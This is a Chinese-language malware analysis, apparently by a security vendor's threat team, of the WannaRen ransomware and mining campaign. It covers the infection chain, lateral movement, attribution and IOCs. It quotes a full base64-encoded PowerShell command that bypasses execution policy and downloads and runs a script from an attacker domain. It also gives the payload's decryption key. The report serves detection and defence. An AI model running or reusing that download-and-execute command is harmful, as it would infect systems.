近日,有网友在社交媒体公开求助,称感染了一款名为WannaRen的新型勒索软件,部分文件被加密,需要支付0.05个比特币(约合2500元人民币)。部分截图如下: WannaRen解密器图标伪装Everything。 奇安信病毒响应中心在发现该情况后,第一时间发布了关于该WannaRen的样本解密器分析报告。 WannaRen勒索软件事件分析报告 https://mp.weixin.qq.com/s/pWB1Ex2X6AcSSMIswLizXg 勒索软件的样本解密器截图: 为了进一步补充攻击视角,奇安信威胁情报中心红雨滴团队详细分析事件后,将更多关于该勒索攻击的检测维度公布。 攻击事件分析根据线索,我们发现于4月2号天擎用户的拦截日志显示 powershell.exe -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBjAHMALgBzAHMAbABzAG4AZwB5AGwAOQAwAC4AYwBvAG0AJwApACkA 通过解码发现powershell会去下载并执行cs.的脚本。 实际上该域名会重定向至如下链接。 http://cpu./vip.txt 从Vip.txt中的脚本可见攻击者会从vim-cn.com图床上下载WINWORD.EXE和wwlib.dll,这种是典型的白加黑攻击手段。通过执行WINWORD.EXE即可加载于同一目录的wwlib.dll。 紧接着wwlib.dll会去加载Public\目录下的you程序,有趣的是,fm文件会记录程序的运行时间,该时间使用简体中文进行记录,因此攻击者是中国人的概率非常大。 该程序需要会使用busahk87909we对you进行解密,解密后在内存加载WannaRen勒索软件 之后的事,跟开头的感染后的症状一致了。 除了上面的勒索情况外,Powershell下载器还具有挖矿功能,其下载后会重命名为nb.exe,其意指中文的** 有趣的是,在事情发酵之后,攻击者删除了脚本中,下载勒索模块的链接,变成了下面这个模块。 我们可以合理的猜测,勒索软件作者都没有料到,就因为他将勒索软件命名为WannaRen,收到了如此大的关注,因此将链接删掉从而试图逃避检测。 然而目前事情居然上了微博热搜,而且阅读量高达1.1亿,只能说当年的WannaCry余威仍在不断散发,攻击者这次是不好跑了。 横向移动功能从Powershell下载器中可以看到,攻击者会通过图床链接去下载永恒之蓝传播模块。 而office.exe实际上是自解压文件。
此外,该脚本还有一种很少见的横向移动辅助手法,该手法利用了Everything拥有的http服务器功能。 首先,其会在受害器上下载aaaa.exe,并保存到C:\Users\Public\目录下,功能为释放everything并开启http服务器功能,这样在同一内网的其他受害者就可以通过该http服务器下载上面的恶意程序,从而进一步的扩散受害面。
关联分析通过攻击者的域名,我们发现在1月份奇安信威胁情报中心与就已经将该域名与HideShadowMiner组织的攻击关联在一起,并将域名置黑,因此部署相关情报产品的用户均无遭受此威胁。
HideShadowMiner,国内统称为匿影组织,该组织此前一直进行挖矿攻击,此前国内友商就曾发布过该组织的攻击报告: http://www.ijinshan.com/info/202003201525.shtml 此外,我们通过特征,发现匿影组织还使用了多个域名搭载同一套Powershell攻击框架发起攻击。 http://us./v.txt http://cpu./vip.txt 相关攻击域名在全网的访问趋势图,时间集中在近期,符合事件发生时段。
除了上面的线索外,还需要注意的是,攻击者会通过微当下载去下载APK程序,并重命名为exe文件,但这也意味着,微当下载并没有识别出该APK是恶意的PE程序并进行了放行,这对于攻击者来说是一个非常好利用的资源。
微当下载的软件提交方式
总结万幸的是,虽说整个攻击过程都被奇安信分析人员解析清楚,但是由于在2020年4月2号奇安信天擎就已能检测执行Powershell攻击的行为,因此奇安信的用户无一中招。
此外,退一万步说,即使Powershell执行起来了,但是对应的勒索病毒模块同样被天擎查杀。
奇安信红雨滴团队提醒广大用户,及时备份重要文件,更新安装补丁,切勿打开社交媒体分享的来历不明的链接,不点击执行未知来源的邮件附件,不运行夸张的标题的未知文件,不安装非正规途径来源的APP。 我们提供了IOC,以供用户自查。 IOCcpu./xx.txt cpu./wmi.txt us./v.txt cpu./vip.txt xx. xx. wmi. wmi. d. cs. cpu. 相关恶意程序下发路径 C:\ProgramData\227.exe C:\ProgramData\office.exe C:\ProgramData\nb.exe C:\ProgramData\WinRing0x64.sys C:\ProgramData\officekms.exe C:\ProgramData\xeexfrt.txt C:\Users\Public\MicrosftEdgeCP.exe C:\Users\Public\1\winlogtrf.exe C:\ProgramData\227.txt C:\Users\Public\ aaaa.exe C:\Users\Public\you C:\ProgramData\wwlib.dll Powershell下载器Hash 6355d278e4b9caec1f9774db5d2c54aa WannaRen勒索软件主体Hash 9854723bf668c0303a966f2c282f72ea |
|
|
来自: qingse1976 > 《我的图书馆》
